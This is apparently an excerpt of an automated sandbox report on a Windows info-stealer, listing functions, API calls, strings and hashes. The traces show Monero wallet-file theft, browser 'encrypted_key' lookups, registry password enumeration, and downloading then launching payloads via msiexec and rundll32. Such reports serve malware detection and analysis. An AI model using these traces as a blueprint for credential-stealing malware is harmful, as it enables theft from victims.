                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: 383de669e500d8f03e43a8500a823be3bbcf80a0fa62e6491a7a35f21efa5c06
                  • Instruction ID: 0d551032674b2423b3261ca401b3ba674eed8bcd3e0a489a369f9531314dca0b
                  • Opcode Fuzzy Hash: 383de669e500d8f03e43a8500a823be3bbcf80a0fa62e6491a7a35f21efa5c06
                  • Instruction Fuzzy Hash: F071CBB5910208ABDB08DFE4DD89FEEB7B9BF48700F108518F615AB290DB74A905CF61
                  Function 00632E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 006331C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 0063335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 006334EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 09fb28c7e642a7baef2ac3b97836f8d133e15eeeafba233618e63fa9f77184e4
                  • Instruction ID: 9eceda8bd942804dde836549cd0317041f1be4d43bc8def0c5b9c71560df24ee
                  • Opcode Fuzzy Hash: 09fb28c7e642a7baef2ac3b97836f8d133e15eeeafba233618e63fa9f77184e4
                  • Instruction Fuzzy Hash: 2C12F971810118AADB49EBE0DC92FEEB73AAF14300F50415DE54676191EF702B4ADFEA
                  Function 006352C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 00626280: InternetOpenA.WININET(00640DFE,00000001,00000000,00000000,00000000), ref: 006262E1
                    • Part of subcall function 00626280: StrCmpCA.SHLWAPI(?,0131F730), ref: 00626303
                    • Part of subcall function 00626280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00626335
                    • Part of subcall function 00626280: HttpOpenRequestA.WININET(00000000,GET,?,0131F490,00000000,00000000,00400100,00000000), ref: 00626385
                    • Part of subcall function 00626280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006263BF
                    • Part of subcall function 00626280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006263D1
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00635318
                  • lstrlen.KERNEL32(00000000), ref: 0063532F
                    • Part of subcall function 00638E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00638E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00635364
                  • lstrlen.KERNEL32(00000000), ref: 00635383
                  • lstrlen.KERNEL32(00000000), ref: 006353AE
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: d8b636d6a96f40c75660e381225c408e46e32c5b7813e4f25f51cc3d07a691e4
                  • Instruction ID: 6041f7b371c39283ef099448a8c633559838c2c02d0a3b21f088873b39de599e
                  • Opcode Fuzzy Hash: d8b636d6a96f40c75660e381225c408e46e32c5b7813e4f25f51cc3d07a691e4
                  • Instruction Fuzzy Hash: 72510070910148ABCB58FFA0DD96AED777AAF10300F50402CF8466B592DF346B46EBE6
                  Function 006312D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: e571271997b2a1877a55b165098ba5f7d1277b42a96d5cc57508489a2cc5f659
                  • Instruction ID: 551692baca6c6059a77b6dcb19caec7b0afe9ed6af2b9d21c3db32d4abe98068
                  • Opcode Fuzzy Hash: e571271997b2a1877a55b165098ba5f7d1277b42a96d5cc57508489a2cc5f659
                  • Instruction Fuzzy Hash: 32C1C6B59002189BCB58EF60DC89FEA7379BF64304F00459CF50AA7241DB70AA85DFD5
                  Function 00634280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00638DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00638E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 006342EC
                  • lstrcat.KERNEL32(?,0131F3E8), ref: 0063430B
                  • lstrcat.KERNEL32(?,?), ref: 0063431F
                  • lstrcat.KERNEL32(?,0131E580), ref: 00634333
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 00638D90: GetFileAttributesA.KERNEL32(00000000,?,00621B54,?,?,0064564C,?,?,00640E1F), ref: 00638D9F
                    • Part of subcall function 00629CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00629D39
                    • Part of subcall function 006299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006299EC
                    • Part of subcall function 006299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00629A11
                    • Part of subcall function 006299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00629A31
                    • Part of subcall function 006299C0: ReadFile.KERNEL32(000000FF,?,00000000,0062148F,00000000), ref: 00629A5A
                    • Part of subcall function 006299C0: LocalFree.KERNEL32(0062148F), ref: 00629A90
                    • Part of subcall function 006299C0: CloseHandle.KERNEL32(000000FF), ref: 00629A9A
                    • Part of subcall function 006393C0: GlobalAlloc.KERNEL32(00000000,006343DD,006343DD), ref: 006393D3
                  • StrStrA.SHLWAPI(?,0131F4C0), ref: 006343F3
                  • GlobalFree.KERNEL32(?), ref: 00634512
                    • Part of subcall function 00629AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nb,00000000,00000000), ref: 00629AEF
                    • Part of subcall function 00629AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00624EEE,00000000,?), ref: 00629B01
                    • Part of subcall function 00629AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nb,00000000,00000000), ref: 00629B2A
                    • Part of subcall function 00629AC0: LocalFree.KERNEL32(?,?,?,?,00624EEE,00000000,?), ref: 00629B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 006344A3
                  • StrCmpCA.SHLWAPI(?,006408D1), ref: 006344C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 006344D2
                  • lstrcat.KERNEL32(00000000,?), ref: 006344E5
                  • lstrcat.KERNEL32(00000000,00640FB8), ref: 006344F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 56bdbd7182c27e4b0d137ab101138f65a02515480b49c90e843e26ca4506c643
                  • Instruction ID: 691de739a195e24c2a891ff1f230082ef0125ea8477fa537497f2250ba0d961a
                  • Opcode Fuzzy Hash: 56bdbd7182c27e4b0d137ab101138f65a02515480b49c90e843e26ca4506c643
                  • Instruction Fuzzy Hash: A17156B6900218ABDB54EBA0DC85FEE7379BF88300F00459CF605A7181DA75EB45CFA5
                  Function 00621310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 006212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006212B4
                    • Part of subcall function 006212A0: RtlAllocateHeap.NTDLL(00000000), ref: 006212BB
                    • Part of subcall function 006212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006212D7
                    • Part of subcall function 006212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006212F5
                    • Part of subcall function 006212A0: RegCloseKey.ADVAPI32(?), ref: 006212FF
                  • lstrcat.KERNEL32(?,00000000), ref: 0062134F
                  • lstrlen.KERNEL32(?), ref: 0062135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00621377
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 00638B60: GetSystemTime.KERNEL32(00640E1A,0131B558,006405AE,?,?,006213F9,?,0000001A,00640E1A,00000000,?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 00638B86
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00621465
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 006299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006299EC
                    • Part of subcall function 006299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00629A11
                    • Part of subcall function 006299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00629A31
                    • Part of subcall function 006299C0: ReadFile.KERNEL32(000000FF,?,00000000,0062148F,00000000), ref: 00629A5A
                    • Part of subcall function 006299C0: LocalFree.KERNEL32(0062148F), ref: 00629A90
                    • Part of subcall function 006299C0: CloseHandle.KERNEL32(000000FF), ref: 00629A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 006214EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: 572234510ae6b50a605353b74c4c32543ca87c40f5903e6f8415efbc8bb3a125
                  • Instruction ID: 31d34ddcc1e894316ce6430764f99a861e594a8a1bf27dadb4695898550c29b2
                  • Opcode Fuzzy Hash: 572234510ae6b50a605353b74c4c32543ca87c40f5903e6f8415efbc8bb3a125
                  • Instruction Fuzzy Hash: 565152B1D1011857CB55FBA0DC92BED733DAF54300F4041ACB64A66081EE706B89DFEA
                  Function 006275D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 006272D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0062733A
                    • Part of subcall function 006272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006273B1
                    • Part of subcall function 006272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0062740D
                    • Part of subcall function 006272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00627452
                    • Part of subcall function 006272D0: HeapFree.KERNEL32(00000000), ref: 00627459
                  • lstrcat.KERNEL32(00000000,006417FC), ref: 00627606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00627648
                  • lstrcat.KERNEL32(00000000, : ), ref: 0062765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 0062768F
                  • lstrcat.KERNEL32(00000000,00641804), ref: 006276A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 006276D3
                  • lstrcat.KERNEL32(00000000,00641808), ref: 006276ED
                  • task.LIBCPMTD ref: 006276FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                  • String ID: :
                  • API String ID: 2677904052-3653984579
                  • Opcode ID: 95ab200e8d3d0e495eebc9d38c7a97197a836f6a7a5c35196ffe980dd5bcc203
                  • Instruction ID: eb32d288a2a371a213c51040b506f704f5c386a544e2ad2c8688b7717424ed01
                  • Opcode Fuzzy Hash: 95ab200e8d3d0e495eebc9d38c7a97197a836f6a7a5c35196ffe980dd5bcc203
                  • Instruction Fuzzy Hash: 79317C71901509DFCB48EBA4EC8ADFE777ABB55301B155018F202B72A0DA74E942CF96
                  Function 00638100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0131F040,00000000,?,00640E2C,00000000,?,00000000), ref: 00638130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00638137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00638158
                  • __aulldiv.LIBCMT ref: 00638172
                  • __aulldiv.LIBCMT ref: 00638180
                  • wsprintfA.USER32 ref: 006381AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: 4120099b1d365520825aa00acf30894420987434365d31c657665937583f4034
                  • Instruction ID: df44dcd6dca91801c975250c2d6dbc47280f8de3b48de849968687a44e8827d3
                  • Opcode Fuzzy Hash: 4120099b1d365520825aa00acf30894420987434365d31c657665937583f4034
                  • Instruction Fuzzy Hash: E0214DB1E44318ABDB04DFD4DC49FAEB7B9FB44B00F104119F605BB280C7B869018BA9
                  Function 006260A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 006247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00624839
                    • Part of subcall function 006247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00624849
                  • InternetOpenA.WININET(00640DF7,00000001,00000000,00000000,00000000), ref: 0062610F
                  • StrCmpCA.SHLWAPI(?,0131F730), ref: 00626147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0062618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006261B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 006261DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0062620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00626249
                  • InternetCloseHandle.WININET(?), ref: 00626253
                  • InternetCloseHandle.WININET(00000000), ref: 00626260
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: d4e92a258e93653990368fe7bf22c649d7b56d456c7a2e527551507b7ebfcafd
                  • Instruction ID: 1805268c435758f84514b67bc2a9f5bc396da5991015e43228497816bf135158
                  • Opcode Fuzzy Hash: d4e92a258e93653990368fe7bf22c649d7b56d456c7a2e527551507b7ebfcafd
